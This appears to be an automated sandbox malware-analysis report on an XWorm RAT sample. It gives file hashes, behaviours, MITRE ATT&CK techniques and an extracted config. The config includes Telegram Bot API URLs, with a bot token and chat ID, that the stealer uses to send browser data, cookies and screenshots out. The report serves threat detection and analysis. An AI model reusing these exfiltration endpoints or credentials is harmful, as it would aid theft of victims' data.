General
-
Target
XWorm-RAT
-
Size
286KB
-
Sample
241205-n96pestmgz
-
MD5
3e93b5fa005b274eb84d23478ec99b48
-
SHA1
a0952ac33f53143430b3d95f8d040fe43244b107
-
SHA256
bcd1d83e9ada9ee87dc4b81ae89bf9ec7ff393291498a06a6fdd1beda496e947
-
SHA512
5339e319df657b7b366129b27141ac6f2e668f668e6916977f9506127df3777b68e64d587757525bcdcfc4f5f4236a0433923bc38819d84226aec0a0892dd313
-
SSDEEP
6144:1yssgpOL/saqkPV9FemLtcIDSsmwf9KvZJT3CqbMrhryf65NRPaCieMjAkvCJv1j:kssgpOL/saqkPV9FemLtcIDSsmwf9Kvs
Static task
static1
Malware Config
Extracted
xworm
127.0.0.1:7000
LDr3dSUbweENStU4
-
install_file
USB.exe
Extracted
gurcu
https://api.telegram.org/bot7661594921:AAFaXMAKOmV5u6KsEaGlDyc48-xcrQUMR_U/sendDocument?chat_id=2024893777&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb)%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%84%20-%20BrowserDownloads.txt%20(0.21%20kb
https://api.telegram.org/bot7661594921:AAFaXMAKOmV5u6KsEaGlDyc48-xcrQUMR_U/sendMessage?chat_id=2024893777
https://api.telegram.org/bot7661594921:AAFaXMAKOmV5u6KsEaGlDyc48-xcrQUMR_U/getUpdates?offset=-
https://api.telegram.org/bot7661594921:AAFaXMAKOmV5u6KsEaGlDyc48-xcrQUMR_U/sendDocument?chat_id=2024893777&caption=%F0%9F%93%B8Screenshot%20take
Targets
-
-
Target
XWorm-RAT
-
Size
286KB
-
MD5
3e93b5fa005b274eb84d23478ec99b48
-
SHA1
a0952ac33f53143430b3d95f8d040fe43244b107
-
SHA256
bcd1d83e9ada9ee87dc4b81ae89bf9ec7ff393291498a06a6fdd1beda496e947
-
SHA512
5339e319df657b7b366129b27141ac6f2e668f668e6916977f9506127df3777b68e64d587757525bcdcfc4f5f4236a0433923bc38819d84226aec0a0892dd313
-
SSDEEP
6144:1yssgpOL/saqkPV9FemLtcIDSsmwf9KvZJT3CqbMrhryf65NRPaCieMjAkvCJv1j:kssgpOL/saqkPV9FemLtcIDSsmwf9Kvs
-
Detect Xworm Payload
-
Gurcu family
-
Xworm family
-
Executes dropped EXE
-
Loads dropped DLL
-
Uses the VBS compiler for execution
-
Adds Run key to start application
-
Legitimate hosting services abused for malware hosting/C2
-
Looks up external IP address via web service
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Enumerates processes with tasklist
-
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
4Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1